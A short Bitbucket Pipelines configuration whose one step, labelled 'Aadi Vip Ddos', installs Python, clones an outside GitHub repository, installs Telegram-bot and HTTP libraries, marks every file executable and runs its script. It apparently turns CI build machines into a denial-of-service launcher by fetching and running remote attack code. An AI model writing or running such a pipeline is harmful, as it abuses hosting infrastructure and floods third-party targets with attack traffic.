pipelines:
  default:
    - step:
        name: AADI VIP
        size: 4x
        image: nvidia/cuda:11.8.0-runtime-ubuntu20.04
        script:
          - echo "Aadi Vip Ddos..."
          - apt-get update && apt-get upgrade -y && apt-get install -y python3 python3-pip
          - git clone https://github.com/aaduopl/Aa && cd Aa && pip install telebot pymongo aiohttp && lscpu && chmod +x * && python3 m.py
